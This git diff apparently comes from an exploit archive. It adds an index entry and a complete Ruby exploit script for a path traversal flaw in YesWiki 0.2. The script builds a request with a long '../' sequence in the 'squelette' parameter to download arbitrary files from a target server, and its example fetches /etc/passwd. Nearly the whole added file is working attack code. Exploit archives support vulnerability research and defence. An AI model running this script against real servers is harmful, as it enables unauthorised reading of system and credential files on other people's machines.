diff --git a/files.csv b/files.csv index 828ac9950..279e37607 100755 --- a/files.csv +++ b/files.csv @@ -34380,6 +34380,7 @@ id,file,description,date,author,platform,type,port 38063,platforms/php/webapps/38063.txt,"WordPress Wp-ImageZoom Theme 'id' Parameter SQL Injection Vulnerability",2012-11-26,Amirh03in,php,webapps,0 38064,platforms/php/webapps/38064.txt,"WordPress CStar Design 'id' Parameter SQL Injection Vulnerability",2012-11-27,Amirh03in,php,webapps,0 38065,platforms/osx/shellcode/38065.txt,"OS X x64 /bin/sh Shellcode_ NULL Byte Free_ 34 bytes",2015-09-02,"Fitzl Csaba",osx,shellcode,0 +38071,platforms/php/webapps/38071.rb,"YesWiki 0.2 - Path Traversal Vulnerability",2015-09-02,HaHwul,php,webapps,80 38072,platforms/windows/dos/38072.py,"SphereFTP Server 2.0 - Crash PoC",2015-09-02,"Meisam Monsef",windows,dos,21 38073,platforms/hardware/webapps/38073.html,"GPON Home Router FTP G-93RG1 - CSRF Command Execution Vulnerability",2015-09-02,"Phan Thanh Duy",hardware,webapps,80 38074,platforms/php/webapps/38074.txt,"Cerb 7.0.3 - CSRF Vulnerability",2015-09-02,"High-Tech Bridge SA",php,webapps,80 diff --git a/platforms/php/webapps/38071.rb b/platforms/php/webapps/38071.rb new file mode 100755 index 000000000..a85d89b4b --- /dev/null +++ b/platforms/php/webapps/38071.rb @@ -0,0 +1,44 @@ +# Exploit Title: YESWIKI 0.2 - Path Traversal +# Date: 2015-09-02 +# Exploit Author: HaHwul +# Exploit Author Blog: http://www.codeblack.net +# Vendor Homepage: http://yeswiki.net +# Software Link: https://github.com/YesWiki/yeswiki +# Version: yeswiki 0.2 +# Tested on: Debian [Wheezy] +# CVE : none +# =========================================== + +#Vulnerability +#Open Browser: http://[targetURL]//vul_test/yeswiki/wakka.php?wiki=PagesACreer/edit&theme=yeswiki&squelette=/../../../../../../../../../../../../etc/passwd&style=gray.css&bgimg=&newpage=1 + +require "net/http" +require "uri" + +if ARGV.length != 2 + +puts "YESWIKI Path Traversal Exploit - File Downloader" +puts "Usage: ruby yeswiki_traversal.rb [targetURL wakka.php] [File name]" +puts " Example : ~~.rb http://127.0.0.1/vul_test/yeswiki/wakka.php /etc/passwd" +puts " exploit & code by hahwul[www.codeblack.net]" + +else +puts "YESWIKI Path Traversal Exploit - File Downloader" +puts "#set Payload..." +target=ARGV[0] +downfile=ARGV[1] +puts " + target : #{target}" +puts " + DownFile : #{downfile}" +puts "#Exploit" +uri = URI.parse("#{target}/vul_test/yeswiki/wakka.php") +uri.query = URI.encode_www_form({"wiki"=>"PagesACreer/edit","newpage"=>"1","style"=>"gray.css","bgimg"=>"","squelette"=>"/../../../../../../../../../../../../#{downfile}","theme"=>"yeswiki"}) +http = Net::HTTP.new(uri.host, uri.port) +request = Net::HTTP::Get.new(uri.request_uri) +response = http.request(request) +puts "#Response code: "+response.code +endNm = response.body.index("<") +result = response.body[0..endNm-1] +puts "#Result: "+result +puts "#End.." +end +